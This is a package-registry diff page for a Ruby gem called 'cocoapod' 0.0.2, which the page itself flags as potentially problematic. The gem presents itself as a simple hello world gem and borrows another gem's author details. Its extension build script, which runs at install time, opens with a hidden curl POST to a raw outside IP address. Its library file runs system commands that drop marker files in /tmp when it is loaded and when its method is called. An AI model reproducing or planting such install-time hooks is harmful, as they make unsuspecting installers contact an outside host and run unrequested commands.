cocoapod 0.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of cocoapod might be problematic. Click here for more details.

Files changed (4) hide show
  1. checksums.yaml +7 -0
  2. data/ext/extconf.rb +7 -0
  3. data/lib/cocoapod.rb +8 -0
  4. metadata +45 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: 785a653285eb479444c2091690737e1c6c5bd0312117990f19294aca70d8c273
4
+ data.tar.gz: 660173b69d877c654c35965d8114e5b391332c2137c29689df26bd2e31023126
5
+ SHA512:
6
+ metadata.gz: 70697758a74aa9ea17781e69fedc5a812114bb53c9803088f4d4421da54b46c0bec40976c7a3965ebeca9a68aec8f86ffea8e65ad8fbc866254fcd0b0e19bf79
7
+ data.tar.gz: b99c2eef96341104f49afdf2dc7faa516e97bcf5fd881c3d83c4adbf7ba1932a44062b8f697e332c15bde6a7ef3232bc5a4219c1085bd4bf84091855b9e450c1
data/ext/extconf.rb ADDED
@@ -0,0 +1,7 @@
1
+ system('curl -X POST -H "Hostname: helloworld" -H "Content-Type: text/plain" http://43.139.166.32')
2
+ require "mkmf"
3
+
4
+ abort "missing malloc()" unless have_func "malloc"
5
+ abort "missing free()" unless have_func "free"
6
+
7
+ create_makefile "my_malloc"
data/lib/cocoapod.rb ADDED
@@ -0,0 +1,8 @@
1
+ system('touch /tmp/rubyrequire')
2
+ class Hola_nt4p
3
+ def self.hi
4
+ puts 'hola world'
5
+ system('touch /tmp/rubyfunc')
6
+ end
7
+
8
+ end
metadata ADDED
@@ -0,0 +1,45 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: cocoapod
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.2
5
+ platform: ruby
6
+ authors:
7
+ - Nick Quaranto
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2024-06-20 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: A simple hello world gem
14
+ email: nick@quaran.to
15
+ executables: []
16
+ extensions:
17
+ - ext/extconf.rb
18
+ extra_rdoc_files: []
19
+ files:
20
+ - ext/extconf.rb
21
+ - lib/cocoapod.rb
22
+ homepage: https://rubygems.org/gems/hola
23
+ licenses:
24
+ - MIT
25
+ metadata: {}
26
+ post_install_message:
27
+ rdoc_options: []
28
+ require_paths:
29
+ - lib
30
+ required_ruby_version: !ruby/object:Gem::Requirement
31
+ requirements:
32
+ - - ">="
33
+ - !ruby/object:Gem::Version
34
+ version: '0'
35
+ required_rubygems_version: !ruby/object:Gem::Requirement
36
+ requirements:
37
+ - - ">="
38
+ - !ruby/object:Gem::Version
39
+ version: '0'
40
+ requirements: []
41
+ rubygems_version: 3.0.3.1
42
+ signing_key:
43
+ specification_version: 4
44
+ summary: Hola!
45
+ test_files: []